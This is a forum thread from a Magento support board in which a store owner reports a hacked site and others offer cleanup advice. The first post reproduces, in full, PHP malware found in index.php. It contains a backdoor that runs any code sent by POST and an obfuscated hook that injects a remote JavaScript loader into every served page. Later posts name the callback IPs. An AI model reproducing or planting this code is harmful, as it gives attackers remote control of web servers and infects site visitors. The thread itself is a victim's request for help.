Magento Forum

   
Can’t access store of admin
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

I found this on the first line of my index.php file:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzYzdOcmlwckl0JTIwc3JjckklM0QlMkYlMkZHTDk0JTJFMjQ3N04lMkUyJTJFMXJJOTVHTCUyRmpyd1RxcndUdWU4UHJ5JTJFSWxPanMlM0UlM0MlMkZzcndUY3JJclVVWmlVVVpwSWxPdCUzRScpLnJlcGxhY2UoLzU4VXxyd1R8VVVafElsT3xHTHxySXw4UHw3Ti9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos;($v,'[removed]')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
<?php

I am assuming my file was hacked.

Should Index.php be 0644 or 0755?

 
Magento Community Magento Community
Magento Community
Magento Community
 
Periculi
Sr. Member
 
Total Posts:  249
Joined:  2009-02-03
 

Ouch.  I did a google search on TMP_XHGFJOKL and came up with a load of nasty that has happened to a lot of other people on a bunch of software.

My live server Index.php are all set to 0644 and I have no problems with permissions, so I guess try that and you may want to block some IPs.  From the Google search I found this:

OKwell I decoded the thing, and what it does is inserts a javascript call to two serversone in Beijing and the other in Moscow.

http://samspade.org/whois/218.93.202.61
http://samspade.org/whois/78.110.175.21

What it fetches nobody knows... unless someone is able to rip the contents from those addresses?

Not saying that the IP are correct for your hacker but you might be able to decode it, and also check your access logs and you might be able to track the IP down and permanently block them out.

Search your files for more instances of that code, or upload clean ones!

 
Magento Community Magento Community
Magento Community
Magento Community
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

Thanks for the help.

I stripped the code out and changed my index.php and db.php to 0644.

Today at 3:19 I got hit again.  Same code.

Not sure what is going on.

 
Magento Community Magento Community
Magento Community
Magento Community
 
Periculi
Sr. Member
 
Total Posts:  249
Joined:  2009-02-03
 

Well, it’s quite obvious that the original entry point is still open.

I would have done the following -

Taken my site offline.

Contacted my hosting company regarding server security breach.  If I was on a shared server, asked them to help me track down potential security holes.

Delete all the files on the server.

Total reinstall of all the files on the server with clean backups, placing magento core above the public accessed folders.

Analyzed apache (or whatever) server logs looking for potential hacks or IPs to block.

I would not have done the following -

Attempted to repair the corrupted files on my server.

Considered the problem solved without finding the access point the hacker used.

Did you find how your site was compromised in the first place?  Did you consider that there is a script buried somewhere else on your server that is allowing the hacker to continue to have free access to your files?

 
Magento Community Magento Community
Magento Community
Magento Community
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

My ISP says there is nothing they can do.  “Absolutely” nothing.

I did a clean install of magento and my site an today, the 18th, it happened again.

I had found two hidden files on my server in folders that should not be able to be accessed from the outside.

I also have found my logs erase for the times that the files are compromised.

So obviously someone has access to the server.

 
Magento Community Magento Community
Magento Community
Magento Community
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

We took our site down, opened a new account, and reinstalled everything.

Still working on reinstalling our uploading program.

We also changed our ftp to sftp and changed all our passwords.

 
Magento Community Magento Community
Magento Community
Magento Community
 
AFemaleProdigy
Jr. Member
 
Total Posts:  13
Joined:  2009-02-18
 

Did you get this problem solved?  Or determine where the hackers were getting in?  Thanks.

 
Magento Community Magento Community
Magento Community
Magento Community
 
bigprinter
Jr. Member
 
Total Posts:  14
Joined:  2009-02-11
 

No,

We did not really solve the problem. 

No matter how many times we changed our passwords, we got hacked again anywhere from 2-7 days.

What we did was have our ISP close our account down and set up a new one.  We have not reinstalled Magento.

Since we got hacked within 2 days of installing it the first time, I am not eager to jump into it again.
Even the security codes we added to our .htaccess file did not help.

The consensus is that this started through an ftp port.  But it is just speculation.

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
    Back to top